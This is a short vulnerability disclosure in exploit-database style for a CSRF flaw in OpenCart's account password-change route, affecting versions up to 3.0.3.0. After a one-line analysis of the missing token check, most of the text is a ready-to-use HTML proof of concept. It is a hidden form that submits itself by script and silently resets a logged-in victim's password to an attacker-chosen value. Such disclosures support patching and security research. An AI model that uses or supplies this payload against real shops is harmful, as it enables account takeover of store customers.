Opencart-v3-0-3-0 user changes password at csrf vulnerability
Software Link: https://github.com/opencart/opencart/ Date: 06.28.2018 Exploit Author:CK01 Version:<= V3-0-3-0 0x00 Vulnerability analysis The user token was not verified at the password change, causing the csrf vulnerability to modify the user password /upload/catalog/controller/account/password.php 0x01 Exploit Save the following exp as html and open the run <html> <body> <form id="post123" name="post123" action="http://192.168.0.46/opencart/index.php?route=account/password&language=en-gb" method="POST" enctype="multipart/form-data"> <input type="hidden" name="password" value="CK01ck01" /> <input type="hidden" name="confirm" value="CK01ck01" /> <script> document.getElementById('post123').submit(); </script> </form> </body> </html>...